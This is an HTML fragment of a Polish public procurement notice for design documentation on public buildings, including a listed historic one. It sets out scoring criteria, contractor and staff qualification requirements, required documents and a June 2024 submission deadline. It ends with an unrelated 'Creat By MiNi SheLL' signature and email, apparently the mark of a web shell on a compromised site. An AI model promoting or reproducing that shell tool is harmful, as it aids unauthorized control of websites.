Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">180 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór oferty zostanie dokonany w oparciu o przyjęte w niniejszym postępowaniu kryteria oceny ofert: Cena brutto (60%) oraz Doświadczenie kluczowego personelu - Projektanta w branży architektoniczno-budowlanej <br/>lub w specjalności konstrukcyjno-budowlanej (40%). Ocena ofert w ramach kryterium nr 1 zostanie przeprowadzona wg wzoru matematycznego opisanego w Rozdziale 14 SWZ. <br/><br/>W ramach kryterium nr 2 „Doświadczenie kluczowego personelu wykonawcy” punkty zostaną przyznane w skali punktowej: 0 pkt. lub 20 pkt. lub 40 pkt, na podstawie oświadczenia Wykonawcy złożonego w Formularz ofertowym. Doświadczenie personelu Wykonawcy dotyczy doświadczenia osoby skierowanej do realizacji niniejszego zamówienia (osoby, którą Wykonawca wskaże w Załączniku nr 7 - Wykaz osób). <br/><br/>Punkty w kryterium nr 2 zostaną przyznane w następujący sposób: <br/><br/>- Za wykazanie skierowanego do realizacji zamówienia Projektanta w branży architektoniczno-budowlanej lub w specjalności konstrukcyjno-budowlanej, który nie posiada doświadczenia w projektowaniu (jako autor lub współautor), zdobytego w okresie ostatnich 10 lat przed upływem terminu składania ofert, przy co najmniej 1 projekcie wdrożonym do realizacji, w oparciu o który uzyskano decyzję o pozwoleniu na budowę, a który swym zakresem obejmował roboty konserwatorskie, polegające na remoncie budynku zabytkowego, wpisanego do rejestru zabytków, którego wartość zrealizowanych robót budowlanych wynosiła minimum 500.000,00 zł brutto (słownie: pięćset tysięcy zł) – Wykonawca otrzyma 0 punktów.<br/><br/>- Za wykazanie skierowanego do realizacji zamówienia Projektanta w branży architektoniczno-budowlanej lub w specjalności konstrukcyjno-budowlanej, który posiada doświadczenie w projektowaniu (jako autor lub współautor), zdobyte w okresie ostatnich 10 lat przed upływem terminu składania ofert, przy co najmniej 1 projekcie wdrożonym do realizacji, w oparciu o które uzyskano decyzję o pozwoleniu na budowę, a które swym zakresem obejmowały roboty konserwatorskie, polegające na remoncie budynku zabytkowego, wpisanego do rejestru zabytków, którego wartość zrealizowanych robót budowlanych wynosiła minimum 500.000,00 zł brutto (słownie: pięćset tysięcy zł) – Wykonawca otrzyma 20 punktów<br/><br/>- Za wykazanie skierowanego do realizacji zamówienia Projektanta w branży architektoniczno-budowlanej lub w specjalności konstrukcyjno-budowlanej, który posiada doświadczenie w projektowaniu (jako autor lub współautor), zdobyte w okresie ostatnich 10 lat przed upływem terminu składania ofert, przy co najmniej 2 projektach i więcej wdrożonym do realizacji, w oparciu o które uzyskano decyzję o pozwoleniu na budowę, a które swym zakresem obejmowały roboty konserwatorskie, polegające na remoncie budynku zabytkowego, wpisanego do rejestru zabytków, którego wartość zrealizowanych robót budowlanych wynosiła minimum 500.000,00 zł brutto (słownie: pięćset tysięcy zł). – Wykonawca otrzyma 40 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kluczowego personelu: Projektanta w branży architektoniczno-budowlanej lub w specjalności konstrukcyjno-budowlanej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu na podstawie art. 108 ust. 1 oraz nie podlegają wykluczeniu na podstawie art. 109 ust. 1 pkt 4;<br/>2) spełniają warunki udziału w postępowaniu dotyczące:<br/><br/>Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu, jeżeli:<br/><br/>W odniesieniu do zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie określa szczegółowego warunku w tym zakresie.<br/><br/>W odniesieniu do uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający nie określa szczegółowego warunku w tym zakresie.<br/><br/>W odniesieniu do sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie określa szczegółowego warunku w tym zakresie.<br/><br/>W odniesieniu do zdolności technicznej lub zawodowej<br/>1.	Wykażą się wykonaniem nie wcześniej niż w okresie ostatnich 10 lat (okresy wyrażone w latach liczy się wstecz od dnia w którym upłynął termin składania ofert w postępowaniu) a jeżeli okres działalności jest krótszy w tym okresie, co najmniej 2 usług polegających na wykonaniu dokumentacji projektowej wraz z uzyskaniem pozwolenia na budowę w zakresie budowy, przebudowy, rozbudowy, remontu, modernizacji min. 2 budynków użyteczności publicznej w rozumieniu § 3 pkt. 6 Rozporządzenia Ministra Infrastruktury i Budownictwa w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie (t.j. Dz.U. z 2022, poz. 1225 z późn. zm.), o wartości usługi co najmniej 150 000,00 zł brutto każda (słownie: sto pięćdziesiąt tysięcy zł 00/100), w tym min. jednego objętego ochroną konserwatora zabytków z podaniem ich przedmiotu, wartości, dat wykonania i podmiotu, na rzecz którego usługi te zostały wykonane oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy. <br/><br/>UWAGA: Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług projektowych z innymi wykonawcami, usługi o których mowa powyżej, dotyczą usług, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/><br/>2.	Wykażą, że dysponują na czas realizacji zamówienia osobami zdolnymi do wykonania zamówienia, tj. posiadającymi następujące doświadczenie i kwalifikacje: <br/>a) co najmniej 1 osobą projektanta w branży architektoniczno-budowlanej lub w specjalności konstrukcyjno-budowlanej, posiadającego stosowne uprawnienia budowlane do projektowania, w swojej specjalności bez ograniczeń, zgodnie z art. 15a, ust. 2 Ustawy z dn. 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2021 r. poz. 2351 z poźn. zm.) lub inne równoważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów.<br/><br/>Jeżeli Projektant skierowany do realizacji zamówienia będzie posiadał doświadczenie w projektowaniu (jako autor lub współautor), zdobyte w okresie ostatnich 10 lat przed upływem terminu składania ofert, przy projekcie/projektach wdrożonych do realizacji, w oparciu o który uzyskano decyzję o pozwoleniu na budowę, a który/re swym zakresem obejmował roboty konserwatorskie, polegające na remoncie budynku zabytkowego wpisanego do rejestru zabytków (objętego ochroną konserwatora zabytków) - zgodnie z ustawą z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (t.j. Dz. U. z 2022 r. poz. 840 z późn. zm.), i którego wartość zrealizowanych robót budowlanych wynosiła minimum 500.000,00 zł brutto (słownie: pięćset tysięcy zł).<br/>- otrzyma odpowiednio 20 pkt. (za jedną realizację) lub 40 pkt (za dwie i więcej realizacji) w II kryterium oceny ofert. <br/><br/>b) co najmniej 1 osobą posiadającą wykształcenie techniczne i uprawnienia do projektowania bez ograniczeń, która w ciągu ostatnich 10 lat przed upływem terminu składania ofert wykonała, lub uczestniczyła w wykonaniu co najmniej 2 projektów instalacji i urządzeń elektrycznych i elektroenergetycznych, <br/><br/>c) co najmniej 1 osobą posiadającą wykształcenie techniczne i uprawnienia do projektowania bez ograniczeń, która w ciągu ostatnich 10 lat przed upływem terminu składania ofert wykonała, lub uczestniczyła w wykonaniu co najmniej 2 projektów instalacji i urządzeń cieplnych, wodociągowych i kanalizacyjnych i wentylacji, <br/><br/> - lub posiadają inne tożsame uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów, albo też posiadają zdobyte w innych państwach równoważne kwalifikacje zawodowe, które zostały uznane na zasadach określonych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2020 r. poz. 220 z późn. zm.), <br/>- wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami. <br/><br/>Osoby te powinny posiadać wymagane uprawnienia do pełnienia samodzielnych funkcji w budownictwie, w swoich branżach, zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. – Prawo budowlane (tekst jedn. Dz.U. 2021 poz. 2351 z dnia 20 grudnia 2021 r. z późn. zm.).<br/><br/>W zakresie doświadczenia ww. osób należy wykazać, że są one członkami właściwej izby samorządu zawodowego oraz mają przynajmniej trzyletnie doświadczenie w projektowaniu w swojej branży. Załącznikiem do umowy o zamówienie publiczne będzie wykaz osób wskazanych do wykonania zamówienia wraz z dokumentami potwierdzającymi uprawnienia, przynależność do branżowej izby i wykazanym doświadczeniem zawodowym.<br/><br/>W zakresie dysponowania sprzętem, wykonawca winien dysponować: Zamawiający nie określa szczegółowego warunku w tym zakresie;<br/><br/>Na potwierdzenie posiadania wymaganego doświadczenia Wykonawca na wezwanie Zamawiającego dostarczy dowody określających czy wykonane przez Wykonawcę usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty pozwalające zbadać należyte wykonanie zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/><br/>2) Oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	W celu wykazania spełnienia przez Wykonawcę warunków, o których mowa w art. 112 ust. 2 pkt 4) ustawy Pzp, które zostały określone przez Zamawiającego w pkt 5.1 SWZ należy złożyć wykaz usług wykonanych nie wcześniej niż w okresie ostatnich 10 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane, oraz z załączeniem dowodów określających czy usługi te zostały wykonane, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy – (wg Załącznika nr 6 do SWZ – Wykaz wykonanych usług).<br/><br/>2)	W celu wykazania spełnienia przez Wykonawcę warunków, o których mowa w art. 112 ust. 2 pkt 4) ustawy Pzp, które zostały określone przez Zamawiającego w pkt 5.1 SWZ należy złożyć wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – (wg Załącznika nr 7 do SWZ – Wykaz osób).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Na ofertę składają się następujące dokumenty i załączniki:<br/>1) Systemowy formularz ofertowy – wypełniony i podpisany przez wykonawcę, dokument wygenerowany i wypełniony na platformie e-zamówienia,<br/>2) Oświadczenie Wykonawcy – Załącznik nr 2 do SWZ<br/>3) Oświadczenie Wykonawcy – Załącznik nr 3 do SWZ<br/>4) Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeśli dotyczy)<br/>5) Zobowiązanie podmiotu udostępniającego zasoby – Załącznik nr 4 do SWZ (jeśli dotyczy)<br/>6) Parafowany Wzór umowy – Załącznik nr 1 do SWZ<br/>7) Stosowne pełnomocnictwa – w przypadku gdy upoważnienie do podpisania oferty nie wynika bezpośrednio z odpisu z właściwego rejestru.<br/>8) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Postanowienia dotyczące wnoszenia oferty wspólnej przez dwóch lub więcej Wykonawców (konsorcja / spółki cywilne):<br/>1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2)	W przypadku składania oferty przez dwóch lub więcej Wykonawców, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, a pełnomocnictwo / upoważnienie do pełnienia takiej funkcji wystawione zgodnie z wymogami ustawowymi, podpisane przez prawnie upoważnionych przedstawicieli każdego z Wykonawców, winno być dołączone do oferty.<br/>3)	W przypadku wyłonienia w postępowaniu, jako najkorzystniejszej oferty składanej wspólnie przez dwóch lub więcej Wykonawców, Zamawiający może przed podpisaniem umowy w sprawie zamówienia publicznego, w wyznaczonym terminie zażądać kopii umowy regulującej współpracę tych Wykonawców.<br/>4)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/><br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1) Każdy z warunków określonych w pkt 5.1 SWZ winien spełniać co najmniej jeden z tych Wykonawców albo wszyscy Wykonawcy wspólnie.<br/>2) Warunki określone w pkt 6.1 SWZ powinien spełniać każdy z Wykonawców samodzielnie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza możliwość zmian treści umowy w okolicznościach szczegółowo opisanych we Wzorze umowy (Załącznik nr 1 do SWZ) w Paragrafie nr 15. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-10 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-zamowienia. Szczegółowy opis sposobu złożenia oraz przygotowania ofert zawiera Rozdział 11 SWZ.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-10 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający informuje, że „Formularz oferty” w zakresie kryterium „Doświadczenia kluczowego personelu wykonawcy” nie stanowi dokumentu składanego w celu potwierdzenia spełniania warunków, o których mowa w art. 112 ust. 2 pkt 4 ustawy Pzp. Przepis art. 223 ust. 1 ustawy Pzp może mieć zastosowanie jedynie w zakresie wyjaśnienia treści złożonych ofert. W następstwie czynności złożenia wyjaśnień Wykonawca nie może uzupełniać „Formularza oferty” w zakresie kryterium „Doświadczenie kluczowego personelu wykonawcy” o dodatkowe zadania nie ujęte w tym formularzu lub dokonywać ich zmiany.

Creat By MiNi SheLL
Email: jattceo@gmail.com